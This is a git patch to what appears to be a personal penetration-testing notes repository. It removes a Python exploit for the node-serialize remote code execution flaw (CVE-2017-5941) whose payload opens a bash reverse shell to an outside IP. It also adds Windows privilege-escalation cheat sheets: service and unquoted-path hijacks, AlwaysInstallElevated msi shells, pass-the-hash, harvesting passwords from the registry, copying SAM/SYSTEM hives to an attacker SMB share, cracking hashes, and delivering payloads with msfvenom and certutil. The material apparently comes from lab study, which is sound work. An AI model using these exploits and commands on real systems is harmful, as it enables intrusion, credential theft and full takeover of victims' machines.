From b35bcc556056a7356c20caed358f799faf10902d Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 16 Oct 2021 00:40:15 +0200 Subject: [PATCH] bump --- 49552.py | 47 ------------------- enumeration/windows/sysinternals.md | 19 ++++++++ .../windows/docs/always_installed_elevated.md | 17 +++++++ exploit/windows/docs/pass_the_hash.md | 7 +++ exploit/windows/docs/password_in_registry.md | 25 ++++++++++ exploit/windows/docs/potatoes.md | 7 +++ exploit/windows/docs/unquoted_path.md | 13 +++++ post_exploitation/docs/powershell.md | 16 +++++++ reverse_shells/docs/msfvenom.md | 11 ++++- 9 files changed, 114 insertions(+), 48 deletions(-) delete mode 100644 49552.py create mode 100644 exploit/windows/docs/always_installed_elevated.md create mode 100644 exploit/windows/docs/pass_the_hash.md create mode 100644 exploit/windows/docs/password_in_registry.md create mode 100644 exploit/windows/docs/potatoes.md create mode 100644 exploit/windows/docs/unquoted_path.md diff --git a/49552.py b/49552.py deleted file mode 100644 index a3a1701..0000000 --- a/49552.py +++ /dev/null @@ -1,47 +0,0 @@ -# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2) -# Exploit Author: UndeadLarva -# Software Link: https://www.npmjs.com/package/node-serialize -# Version: 0.0.4 -# CVE: CVE-2017-5941 - -import requests -import re -import base64 -import sys - -url = 'http://10.10.216.3/' # change this - -payload = ("require('http').ServerResponse.prototype.end = (function (end) {" -"return function () {" -"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));" -"console.log('still inside');" -"const { exec } = require('child_process');" -"exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1');" # change this -"}" -"})(require('http').ServerResponse.prototype.end)") - -# rce = "_$$ND_FUNC$$_process.exit(0)" -#code ="_$$ND_FUNC$$_console.log('behind you')" -#code = "_$$ND_FUNC$$_" + "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}" -#code = "_$$ND_FUNC$$_" + payload - -code = "_$$ND_FUNC$$_console.log(1)()" -#code = "_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });()" -#string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}' -#code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" # change this -code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" -string = '{"email": "'+code+'"}' - -print code - -cookie = {'session':base64.b64encode(string)} - -response = requests.post(url+"?email="+code).text -print response - -#try: -# response = requests.get(url, cookies=cookie).text -# print response -#except requests.exceptions.RequestException as e: -# print('Oops!') -# sys.exit(1) diff --git a/enumeration/windows/sysinternals.md b/enumeration/windows/sysinternals.md index c08734d..c9853ba 100644 --- a/enumeration/windows/sysinternals.md +++ b/enumeration/windows/sysinternals.md @@ -89,9 +89,28 @@ regjump HKLM ``` reg query HKLM ``` +``` Get-Item Get-ItemProperty ``` ## Strings Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters. + +## Create a system authority shell +1. Check permissons +```sh +accesschk.exe /accepteula -uwcqv user +``` +2. Query service +```sh +sq qc +``` +3. Set service config to the msfvenom reverse shell, uploaded previously. +``` +sc config daclsvc binpath= "\"C:\shell.exe"" +``` +4. Start service and gain high priv shell +```sh +net start daclsvc +``` diff --git a/exploit/windows/docs/always_installed_elevated.md b/exploit/windows/docs/always_installed_elevated.md new file mode 100644 index 0000000..23da332 --- /dev/null +++ b/exploit/windows/docs/always_installed_elevated.md @@ -0,0 +1,17 @@ +# AlwaysInstalledElevated + +* Watch out for `AlwaysInstalledElevated` keys inside the registry via +```sh +reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +``` +* Prepare reverse shell on attacker as an msi file +``` +msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o shell.msi +``` +* start the msi on target +```sh +msiexec /quiet /qn /i C:\shell.msi +``` + + diff --git a/exploit/windows/docs/pass_the_hash.md b/exploit/windows/docs/pass_the_hash.md new file mode 100644 index 0000000..6639a00 --- /dev/null +++ b/exploit/windows/docs/pass_the_hash.md @@ -0,0 +1,7 @@ +# Pass the Hash + +* Authenticate with retrieved hash +* User evil-winrm or +``` +pth-winexe -U 'admin%hash' // cmd.exe +``` diff --git a/exploit/windows/docs/password_in_registry.md b/exploit/windows/docs/password_in_registry.md new file mode 100644 index 0000000..729e4a6 --- /dev/null +++ b/exploit/windows/docs/password_in_registry.md @@ -0,0 +1,25 @@ +# Password Inside Registry Key + +* Query passwords saved inside the registry +```sh +reg query HKLM /f password /t REG_SZ /s +``` +* Admin Autologon credentials +``` +reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" +``` +* On attacker, change the credentials on target +```sh +winexe -U 'admin%password' // cmd.exe +``` + +## List other Creds +``` +cmdkey /list +``` +* Open reverse shell +```sh +runas /savecred /user:admin C:\shell.exe +``` + + diff --git a/exploit/windows/docs/potatoes.md b/exploit/windows/docs/potatoes.md new file mode 100644 index 0000000..2789fe6 --- /dev/null +++ b/exploit/windows/docs/potatoes.md @@ -0,0 +1,7 @@ +# Potatoes + +* [Hot Potato](https://foxglovesecurity.com/2016/01/16/hot-potato/) +* [Rotten Potato](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) +* [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/) +* [Juicy Potato](https://ohpe.it/juicy-potato/) +* [Rogue Potato](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/) diff --git a/exploit/windows/docs/unquoted_path.md b/exploit/windows/docs/unquoted_path.md new file mode 100644 index 0000000..8aa73d6 --- /dev/null +++ b/exploit/windows/docs/unquoted_path.md @@ -0,0 +1,13 @@ +# Unquoted Path + +* Path to a service without quotes can be hijacked by inserting other executables and services into the path. +* Some part of path has to be writeable. +## Example +* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe` +```sh +copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe" +``` +```sh +net start +``` + diff --git a/post_exploitation/docs/powershell.md b/post_exploitation/docs/powershell.md index 7d0def6..9de1f48 100644 --- a/post_exploitation/docs/powershell.md +++ b/post_exploitation/docs/powershell.md @@ -6,3 +6,19 @@ save HKLM\SAM C:\Users\Administrator\Desktop\SAM save HKLM\SAM C:\Users\Administrator\Desktop\System ``` * Use `samdump2` + +## Extract Hashes +* Extract via smb server on attacker +``` +copy C:\Windows\Repair\SAM \\\dir\ +copy C:\Windows\Repair\SYSTEM \\\dir\ +``` +* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7) +``` +python pwdump.py SYSTEM SAM +``` +or +``` +hashcat -m 1000 --force /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt +``` + diff --git a/reverse_shells/docs/msfvenom.md b/reverse_shells/docs/msfvenom.md index ed894d2..815515f 100644 --- a/reverse_shells/docs/msfvenom.md +++ b/reverse_shells/docs/msfvenom.md @@ -20,7 +20,7 @@ msfvenom -p ## Windows ### x64 Reverse Shell in exe format ``` -msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST= LPORT= +msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST= LPORT= ``` ### x86 shikata_ga_nai @@ -51,6 +51,15 @@ or on cmd.exe ```sh certutil -urlcache -split -f http://:/shell.exe ``` +* Using SMB +On attacker +```sh +sudo python impacket/examples/smbserver.py dir . +``` +on target +```sh +copy \\\dir\shell.exe C:\shell.exe +``` ## Unix ### netcat reverse